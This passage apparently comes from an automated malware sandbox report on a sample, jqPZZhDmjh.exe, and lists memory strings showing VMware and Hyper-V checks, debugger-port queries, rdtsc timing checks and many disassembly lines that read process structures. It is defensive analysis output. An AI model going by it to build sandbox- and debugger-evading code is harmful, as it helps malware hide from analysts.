              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
              Source: explorer.exe, 00000002.00000002.3304893437.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
              Source: explorer.exe, 00000002.00000002.3304893437.00000000097F3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: explorer.exe, 00000002.00000002.3304893437.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
              Source: explorer.exe, 00000002.00000000.2075170256.000000000C474000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 4'me#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94
              Source: explorer.exe, 00000002.00000000.2066913018.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
              Source: explorer.exe, 00000002.00000000.2073710031.000000000C424000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#4&224f42ef&0&000000#{53f56wP3
              Source: explorer.exe, 00000002.00000002.3304893437.0000000009605000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
              Source: explorer.exe, 00000002.00000000.2056290643.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000002.00000002.3304893437.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000978C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: explorer.exe, 00000002.00000000.2056290643.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
              Source: explorer.exe, 00000002.00000002.3302438018.00000000073E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: explorer.exe, 00000002.00000000.2066913018.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
              Source: explorer.exe, 00000002.00000000.2056290643.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
              Source: explorer.exe, 00000002.00000000.2056290643.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000002.00000000.2066913018.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_00979AA0 rdtsc 0_2_00979AA0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0097ACE0 LdrLoadDll,0_2_0097ACE0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015AC156 mov eax, dword ptr fs:[00000030h]0_2_015AC156
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01684164 mov eax, dword ptr fs:[00000030h]0_2_01684164
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01684164 mov eax, dword ptr fs:[00000030h]0_2_01684164
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B6154 mov eax, dword ptr fs:[00000030h]0_2_015B6154
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B6154 mov eax, dword ptr fs:[00000030h]0_2_015B6154
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01644144 mov eax, dword ptr fs:[00000030h]0_2_01644144
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01644144 mov eax, dword ptr fs:[00000030h]0_2_01644144
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01644144 mov ecx, dword ptr fs:[00000030h]0_2_01644144
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01644144 mov eax, dword ptr fs:[00000030h]0_2_01644144
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01644144 mov eax, dword ptr fs:[00000030h]0_2_01644144
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01648158 mov eax, dword ptr fs:[00000030h]0_2_01648158
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E10E mov eax, dword ptr fs:[00000030h]0_2_0165E10E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E10E mov ecx, dword ptr fs:[00000030h]0_2_0165E10E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E10E mov eax, dword ptr fs:[00000030h]0_2_0165E10E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E10E mov eax, dword ptr fs:[00000030h]0_2_0165E10E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E10E mov ecx, dword ptr fs:[00000030h]0_2_0165E10E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E10E mov eax, dword ptr fs:[00000030h]0_2_0165E10E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E10E mov eax, dword ptr fs:[00000030h]0_2_0165E10E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E10E mov ecx, dword ptr fs:[00000030h]0_2_0165E10E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E10E mov eax, dword ptr fs:[00000030h]0_2_0165E10E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E10E mov ecx, dword ptr fs:[00000030h]0_2_0165E10E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01670115 mov eax, dword ptr fs:[00000030h]0_2_01670115
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E0124 mov eax, dword ptr fs:[00000030h]0_2_015E0124
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165A118 mov ecx, dword ptr fs:[00000030h]0_2_0165A118
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165A118 mov eax, dword ptr fs:[00000030h]0_2_0165A118
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165A118 mov eax, dword ptr fs:[00000030h]0_2_0165A118
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165A118 mov eax, dword ptr fs:[00000030h]0_2_0165A118
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016861E5 mov eax, dword ptr fs:[00000030h]0_2_016861E5
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016761C3 mov eax, dword ptr fs:[00000030h]0_2_016761C3
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016761C3 mov eax, dword ptr fs:[00000030h]0_2_016761C3
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E01F8 mov eax, dword ptr fs:[00000030h]0_2_015E01F8
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162E1D0 mov eax, dword ptr fs:[00000030h]0_2_0162E1D0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162E1D0 mov eax, dword ptr fs:[00000030h]0_2_0162E1D0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162E1D0 mov ecx, dword ptr fs:[00000030h]0_2_0162E1D0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162E1D0 mov eax, dword ptr fs:[00000030h]0_2_0162E1D0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162E1D0 mov eax, dword ptr fs:[00000030h]0_2_0162E1D0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015AA197 mov eax, dword ptr fs:[00000030h]0_2_015AA197
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015AA197 mov eax, dword ptr fs:[00000030h]0_2_015AA197
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015AA197 mov eax, dword ptr fs:[00000030h]0_2_015AA197
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F0185 mov eax, dword ptr fs:[00000030h]0_2_015F0185
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01654180 mov eax, dword ptr fs:[00000030h]0_2_01654180
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01654180 mov eax, dword ptr fs:[00000030h]0_2_01654180
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0166C188 mov eax, dword ptr fs:[00000030h]0_2_0166C188
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0166C188 mov eax, dword ptr fs:[00000030h]0_2_0166C188
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163019F mov eax, dword ptr fs:[00000030h]0_2_0163019F
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163019F mov eax, dword ptr fs:[00000030h]0_2_0163019F
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163019F mov eax, dword ptr fs:[00000030h]0_2_0163019F
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163019F mov eax, dword ptr fs:[00000030h]0_2_0163019F
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B2050 mov eax, dword ptr fs:[00000030h]0_2_015B2050
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DC073 mov eax, dword ptr fs:[00000030h]0_2_015DC073
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01636050 mov eax, dword ptr fs:[00000030h]0_2_01636050
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015CE016 mov eax, dword ptr fs:[00000030h]0_2_015CE016
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015CE016 mov eax, dword ptr fs:[00000030h]0_2_015CE016
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015CE016 mov eax, dword ptr fs:[00000030h]0_2_015CE016
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015CE016 mov eax, dword ptr fs:[00000030h]0_2_015CE016
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01646030 mov eax, dword ptr fs:[00000030h]0_2_01646030
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01634000 mov ecx, dword ptr fs:[00000030h]0_2_01634000
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01652000 mov eax, dword ptr fs:[00000030h]0_2_01652000
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01652000 mov eax, dword ptr fs:[00000030h]0_2_01652000
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01652000 mov eax, dword ptr fs:[00000030h]0_2_01652000
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01652000 mov eax, dword ptr fs:[00000030h]0_2_01652000
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01652000 mov eax, dword ptr fs:[00000030h]0_2_01652000
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01652000 mov eax, dword ptr fs:[00000030h]0_2_01652000
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01652000 mov eax, dword ptr fs:[00000030h]0_2_01652000
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01652000 mov eax, dword ptr fs:[00000030h]0_2_01652000
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015AA020 mov eax, dword ptr fs:[00000030h]0_2_015AA020
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015AC020 mov eax, dword ptr fs:[00000030h]0_2_015AC020
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016360E0 mov eax, dword ptr fs:[00000030h]0_2_016360E0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015AC0F0 mov eax, dword ptr fs:[00000030h]0_2_015AC0F0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F20F0 mov ecx, dword ptr fs:[00000030h]0_2_015F20F0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B80E9 mov eax, dword ptr fs:[00000030h]0_2_015B80E9
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015AA0E3 mov ecx, dword ptr fs:[00000030h]0_2_015AA0E3
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016320DE mov eax, dword ptr fs:[00000030h]0_2_016320DE
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016480A8 mov eax, dword ptr fs:[00000030h]0_2_016480A8
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B208A mov eax, dword ptr fs:[00000030h]0_2_015B208A
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016760B8 mov eax, dword ptr fs:[00000030h]0_2_016760B8
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016760B8 mov ecx, dword ptr fs:[00000030h]0_2_016760B8
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015A80A0 mov eax, dword ptr fs:[00000030h]0_2_015A80A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165437C mov eax, dword ptr fs:[00000030h]0_2_0165437C
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0168634F mov eax, dword ptr fs:[00000030h]0_2_0168634F
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01632349 mov eax, dword ptr fs:[00000030h]0_2_01632349
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01632349 mov eax, dword ptr fs:[00000030h]0_2_01632349
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01632349 mov eax, dword ptr fs:[00000030h]0_2_01632349
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01632349 mov eax, dword ptr fs:[00000030h]0_2_01632349
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01632349 mov eax, dword ptr fs:[00000030h]0_2_01632349
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01632349 mov eax, dword ptr fs:[00000030h]0_2_01632349
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01632349 mov eax, dword ptr fs:[00000030h]0_2_01632349
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01632349 mov eax, dword ptr fs:[00000030h]0_2_01632349
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01632349 mov eax, dword ptr fs:[00000030h]0_2_01632349
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01632349 mov eax, dword ptr fs:[00000030h]0_2_01632349
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01632349 mov eax, dword ptr fs:[00000030h]0_2_01632349
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01632349 mov eax, dword ptr fs:[00000030h]0_2_01632349
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01632349 mov eax, dword ptr fs:[00000030h]0_2_01632349
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01632349 mov eax, dword ptr fs:[00000030h]0_2_01632349
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01632349 mov eax, dword ptr fs:[00000030h]0_2_01632349
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0167A352 mov eax, dword ptr fs:[00000030h]0_2_0167A352
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01658350 mov ecx, dword ptr fs:[00000030h]0_2_01658350
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163035C mov eax, dword ptr fs:[00000030h]0_2_0163035C
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163035C mov eax, dword ptr fs:[00000030h]0_2_0163035C
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163035C mov eax, dword ptr fs:[00000030h]0_2_0163035C
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163035C mov ecx, dword ptr fs:[00000030h]0_2_0163035C
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163035C mov eax, dword ptr fs:[00000030h]0_2_0163035C
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163035C mov eax, dword ptr fs:[00000030h]0_2_0163035C
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015AC310 mov ecx, dword ptr fs:[00000030h]0_2_015AC310
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D0310 mov ecx, dword ptr fs:[00000030h]0_2_015D0310
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EA30B mov eax, dword ptr fs:[00000030h]0_2_015EA30B
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EA30B mov eax, dword ptr fs:[00000030h]0_2_015EA30B
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EA30B mov eax, dword ptr fs:[00000030h]0_2_015EA30B
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BA3C0 mov eax, dword ptr fs:[00000030h]0_2_015BA3C0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BA3C0 mov eax, dword ptr fs:[00000030h]0_2_015BA3C0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BA3C0 mov eax, dword ptr fs:[00000030h]0_2_015BA3C0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BA3C0 mov eax, dword ptr fs:[00000030h]0_2_015BA3C0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BA3C0 mov eax, dword ptr fs:[00000030h]0_2_015BA3C0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BA3C0 mov eax, dword ptr fs:[00000030h]0_2_015BA3C0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B83C0 mov eax, dword ptr fs:[00000030h]0_2_015B83C0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B83C0 mov eax, dword ptr fs:[00000030h]0_2_015B83C0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B83C0 mov eax, dword ptr fs:[00000030h]0_2_015B83C0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B83C0 mov eax, dword ptr fs:[00000030h]0_2_015B83C0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E63FF mov eax, dword ptr fs:[00000030h]0_2_015E63FF
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016363C0 mov eax, dword ptr fs:[00000030h]0_2_016363C0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0166C3CD mov eax, dword ptr fs:[00000030h]0_2_0166C3CD
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015CE3F0 mov eax, dword ptr fs:[00000030h]0_2_015CE3F0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015CE3F0 mov eax, dword ptr fs:[00000030h]0_2_015CE3F0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015CE3F0 mov eax, dword ptr fs:[00000030h]0_2_015CE3F0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016543D4 mov eax, dword ptr fs:[00000030h]0_2_016543D4
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016543D4 mov eax, dword ptr fs:[00000030h]0_2_016543D4
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C03E9 mov eax, dword ptr fs:[00000030h]0_2_015C03E9
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C03E9 mov eax, dword ptr fs:[00000030h]0_2_015C03E9
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C03E9 mov eax, dword ptr fs:[00000030h]0_2_015C03E9
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C03E9 mov eax, dword ptr fs:[00000030h]0_2_015C03E9
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C03E9 mov eax, dword ptr fs:[00000030h]0_2_015C03E9
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C03E9 mov eax, dword ptr fs:[00000030h]0_2_015C03E9
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C03E9 mov eax, dword ptr fs:[00000030h]0_2_015C03E9
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C03E9 mov eax, dword ptr fs:[00000030h]0_2_015C03E9
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E3DB mov eax, dword ptr fs:[00000030h]0_2_0165E3DB
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E3DB mov eax, dword ptr fs:[00000030h]0_2_0165E3DB
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E3DB mov ecx, dword ptr fs:[00000030h]0_2_0165E3DB
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E3DB mov eax, dword ptr fs:[00000030h]0_2_0165E3DB
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015A8397 mov eax, dword ptr fs:[00000030h]0_2_015A8397
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015A8397 mov eax, dword ptr fs:[00000030h]0_2_015A8397
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015A8397 mov eax, dword ptr fs:[00000030h]0_2_015A8397
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015AE388 mov eax, dword ptr fs:[00000030h]0_2_015AE388
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015AE388 mov eax, dword ptr fs:[00000030h]0_2_015AE388
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015AE388 mov eax, dword ptr fs:[00000030h]0_2_015AE388
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D438F mov eax, dword ptr fs:[00000030h]0_2_015D438F
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D438F mov eax, dword ptr fs:[00000030h]0_2_015D438F
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B6259 mov eax, dword ptr fs:[00000030h]0_2_015B6259
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015AA250 mov eax, dword ptr fs:[00000030h]0_2_015AA250
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01660274 mov eax, dword ptr fs:[00000030h]0_2_01660274
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01660274 mov eax, dword ptr fs:[00000030h]0_2_01660274
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01660274 mov eax, dword ptr fs:[00000030h]0_2_01660274
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01660274 mov eax, dword ptr fs:[00000030h]0_2_01660274
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01660274 mov eax, dword ptr fs:[00000030h]0_2_01660274
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01660274 mov eax, dword ptr fs:[00000030h]0_2_01660274
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01660274 mov eax, dword ptr fs:[00000030h]0_2_01660274
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01660274 mov eax, dword ptr fs:[00000030h]0_2_01660274
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01660274 mov eax, dword ptr fs:[00000030h]0_2_01660274
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01660274 mov eax, dword ptr fs:[00000030h]0_2_01660274
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01660274 mov eax, dword ptr fs:[00000030h]0_2_01660274
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01660274 mov eax, dword ptr fs:[00000030h]0_2_01660274
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01638243 mov eax, dword ptr fs:[00000030h]0_2_01638243
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01638243 mov ecx, dword ptr fs:[00000030h]0_2_01638243
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015A826B mov eax, dword ptr fs:[00000030h]0_2_015A826B
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0166A250 mov eax, dword ptr fs:[00000030h]0_2_0166A250
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0166A250 mov eax, dword ptr fs:[00000030h]0_2_0166A250
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B4260 mov eax, dword ptr fs:[00000030h]0_2_015B4260
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B4260 mov eax, dword ptr fs:[00000030h]0_2_015B4260
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B4260 mov eax, dword ptr fs:[00000030h]0_2_015B4260
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015A823B mov eax, dword ptr fs:[00000030h]0_2_015A823B
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BA2C3 mov eax, dword ptr fs:[00000030h]0_2_015BA2C3
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BA2C3 mov eax, dword ptr fs:[00000030h]0_2_015BA2C3
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BA2C3 mov eax, dword ptr fs:[00000030h]0_2_015BA2C3
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BA2C3 mov eax, dword ptr fs:[00000030h]0_2_015BA2C3
